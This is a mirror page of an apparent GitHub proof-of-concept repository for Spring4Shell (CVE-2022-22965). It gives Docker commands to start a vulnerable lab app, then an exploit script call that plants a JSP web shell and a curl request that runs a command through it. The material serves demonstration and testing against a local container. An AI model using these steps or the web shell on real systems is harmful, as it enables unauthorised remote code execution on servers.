Giters

me2nuk / CVE-2022-22965

Spring Framework RCE via Data Binding on JDK 9+ / spring4shell / CVE-2022-22965

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Spring4Shell(CVE-2022-22965)

Spring Framework RCE via Data Binding on JDK 9+ / spring4shell / CVE-2022-22965

Spring4Shell(CVE-2022-22965) Exploit Demo

CVE-2022-22965.RCE.Exploit.mp4

Build

docker pull me2nuk/cves:2022-22965
docker run -it -p 8080:8080 --name=spring4shell me2nuk/cves:2022-22965

POC

python3 -m pip install -r requirements.txt
python3 exploit.py --url="http://localhost:8080/exploit/greeting" --dir="webapps/ROOT" --file="cmd"
curl http://localhost:8080/cmd.jsp?cmd=id

References

About

Spring Framework RCE via Data Binding on JDK 9+ / spring4shell / CVE-2022-22965

Languages

Language:Python 58.7%Language:Java 34.6%Language:Dockerfile 5.5%Language:HTML 1.2%